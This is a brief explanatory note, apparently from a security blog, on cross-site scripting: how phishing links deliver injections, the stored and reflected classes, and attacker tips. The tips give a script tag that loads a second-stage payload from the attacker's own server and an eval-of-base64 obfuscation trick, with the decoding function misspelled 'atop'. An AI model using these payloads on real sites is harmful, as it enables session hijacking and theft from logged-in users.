Short: A user opens a link (e.g. from a phish­ing email) which has a injec­tion in the URL which is then exe­cut­ed on the site as long as the user is logged in.

See also com­mand injec­tions post.

Class­es:

• Stored XSS: An injec­tion is stored on the serv­er and served to (all) users.
• Reflect­ed XSS: An injec­tion is giv­en in the request, e.g. in a parameter.

Tip:

• Use a sec­ond stage to load a more sophis­ti­cat­ed JS instead of inject­ing the code right away. Inject this script:
  <script src=“http://$ownServer/xss.js”></script>
• Use the atop func­tion to use base64 encod­ed strings as/in pay­loads.
  eval(atop("ba...."))